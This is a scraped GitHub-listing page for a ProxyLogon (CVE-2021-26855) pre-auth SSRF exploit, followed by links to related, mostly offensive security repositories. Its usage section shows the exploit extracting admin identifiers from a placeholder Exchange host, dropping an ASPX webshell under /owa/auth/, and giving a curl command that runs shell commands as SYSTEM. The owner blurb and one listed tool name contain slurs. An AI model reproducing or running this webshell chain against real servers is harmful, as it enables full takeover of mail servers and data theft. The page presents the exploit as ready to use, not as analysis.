ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Last update: Nov 28, 2022

Overview

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

For Education and Research

Usage:

C:\>python proxylogon.py mail.evil.corp [email protected]
Attacking target mail.evil.corp
=============================
Got DN: /o=EVIL CORP/ou=first administrative group/cn=Recipients/cn=Administrator
Got SID: S-1-5-21-175943541-xxxxxxxxxx-3152120021-500
Got session id: a99eda32-xxxx-xxxx-825b-5f1c4a6080e7
Got canary: rOWUk7lmAUC2-5HIlQ4EpGq1rPu959xxxxxxxxxx_xxxxxxx_xxx_a-KJ5WR-9j95yu-JOv3dFY.
=========== It means good to go!!!====
Got OAB id: 2f3d4600-xxxx-xxxx-xxxx-b4a4c1d3fb58
Successful!
(+) Webshell drop at https://mail.evil.corp/owa/auth/evilcorp.aspx
(+) Enjoy your shell: curl -ik https://mail.evil.corp/owa/auth/evilcorp.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())
CMD: whoami
nt authority\system

Owner

lulz

retarded kid trying to use internet

GitHub Repository

A Superfast SMS & Call bomber for Linux And Termux !

15 Feb 21, 2022

Separate handling of protected media in Django, with X-Sendfile support

Django Protected Media Django Protected Media is a Django app that manages media that are considered sensitive in a protected fashion. Not only does t

46 Nov 12, 2022

Crowbar - A windows post exploitation tool

Crowbar - A windows post exploitation tool Status - ✔️ This project is now considered finished. Any updates from now on will most likely be new script

29 Nov 20, 2022

NIVOS is a hacking tool that allows you to scan deeply , crack wifi, see people on your network

NIVOS is a hacking tool that allows you to scan deeply , crack wifi, see people on your network. It applies to all linux operating systems. And it is improving every day, new packages are added. Than

263 Jan 01, 2023

PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github

CVE-2021-26855 PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github Why does github remove this exploit because

58 Nov 15, 2022

Python Toolkit containing different Cyber Attacks Tools

Helikopter Python Toolkit containing different Cyber Attacks Tools. Tools in Helikopter Toolkit 1. FattyNigger (PYTHON WORM) 2. Taxes (PYTHON PASS EXT

22 Dec 04, 2022

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence o

2 Nov 09, 2022

Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

cve-2022-23131 cve-2022-23131 zabbix-saml-bypass-exp replace [zbx_signed_session

135 Dec 14, 2022

ThePhish: an automated phishing email analysis tool

ThePhish ThePhish is an automated phishing email analysis tool based on TheHive, Cortex and MISP. It is a web application written in Python 3 and base

675 Jan 03, 2023

Übersicht remote command execution 0day exploit

Übersicht RCE 0day Unauthenticated remote command execution 0day exploit for Übersicht. Description Übersicht is a desktop widget application for m

10 Dec 21, 2021

Sudo Baron Samedit Exploit

CVE-2021-3156 (Sudo Baron Samedit) This repository is CVE-2021-3156 exploit targeting Linux x64. For writeup, please visit https://datafarm-cybersecur

559 Jan 03, 2023

Detection tool of malware(s) by checksum (useful for forensic)

🐍 malware_checker.py Detection tool of malware(s) by checksum (useful for forensic) 📦 Dependencies installation $ pip3 install -r requirements.txt

1 Jan 30, 2022

This a simple tool XSS Detection Suite for CTFs games

2 Nov 24, 2021

command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

CVE-2021-36260 CVE-2021-36260 POC command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validatio

165 Dec 21, 2022

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Related tags

Overview

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Usage:

Owner

lulz

A Superfast SMS & Call bomber for Linux And Termux !

Separate handling of protected media in Django, with X-Sendfile support

Crowbar - A windows post exploitation tool

NIVOS is a hacking tool that allows you to scan deeply , crack wifi, see people on your network

PoC of proxylogon chain SSRF(CVE-2021-26855) to write file by testanull, censored by github

Python Toolkit containing different Cyber Attacks Tools

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

Cve-2022-23131 - Cve-2022-23131 zabbix-saml-bypass-exp

ThePhish: an automated phishing email analysis tool

Übersicht remote command execution 0day exploit

Sudo Baron Samedit Exploit

Detection tool of malware(s) by checksum (useful for forensic)

This a simple tool XSS Detection Suite for CTFs games

command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

an impacket-dependent script exploiting CVE-2019-1040

Apache Flink 目录遍历漏洞批量检测 (CVE-2020-17519)

Mips script decompiles MIPS assembly instructions & bot functionality

Reverse engineered Parler API

Small python script to look for common vulnerabilities on SMTP server.

OpenSource Poc && Vulnerable-Target Storage Box.